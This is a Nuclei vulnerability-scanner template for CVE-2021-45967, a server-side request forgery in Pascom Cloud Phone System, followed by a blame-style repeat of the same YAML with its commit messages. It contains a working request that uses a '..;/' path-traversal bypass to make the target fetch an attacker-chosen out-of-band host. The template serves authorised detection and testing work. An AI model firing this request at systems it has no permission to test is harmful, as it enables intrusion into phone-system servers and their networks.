nuclei-templates/cves/2021/CVE-2021-45967.yaml

id: CVE-2021-45967

info:
  name: Pascom CPS SSRF
  author: dwisiswant0
  severity: high
  description: |
    Pascom version packaged with Cloud Phone System (CPS)
    versions before 7.20 contains a known SSRF issue
  reference:
    - https://kerbit.io/research/read/blog/4
  tags: cve,cve2021,pascom,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS)

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: status
        status:
          - 200
Add Pascom advisories (#3862) * pascom: Add CVE-2021-45967 * pascom: Add CVE-2021-45968 2022-03-19 10:39:09 +00:00			`id: CVE-2021-45967`

			`info:`
			`name: Pascom CPS SSRF`
			`author: dwisiswant0`
			`severity: high`
			`description: \|`
			`Pascom version packaged with Cloud Phone System (CPS)`
			`versions before 7.20 contains a known SSRF issue`
			`reference:`
			`- https://kerbit.io/research/read/blog/4`
			`tags: cve,cve2021,pascom,lfi`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS)`

additional matcher update 2022-03-19 10:40:43 +00:00			`matchers-condition: and`
Add Pascom advisories (#3862) * pascom: Add CVE-2021-45967 * pascom: Add CVE-2021-45968 2022-03-19 10:39:09 +00:00			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
additional matcher update 2022-03-19 10:40:43 +00:00			`- "http"`

			`- type: status`
			`status:`
			`- 200`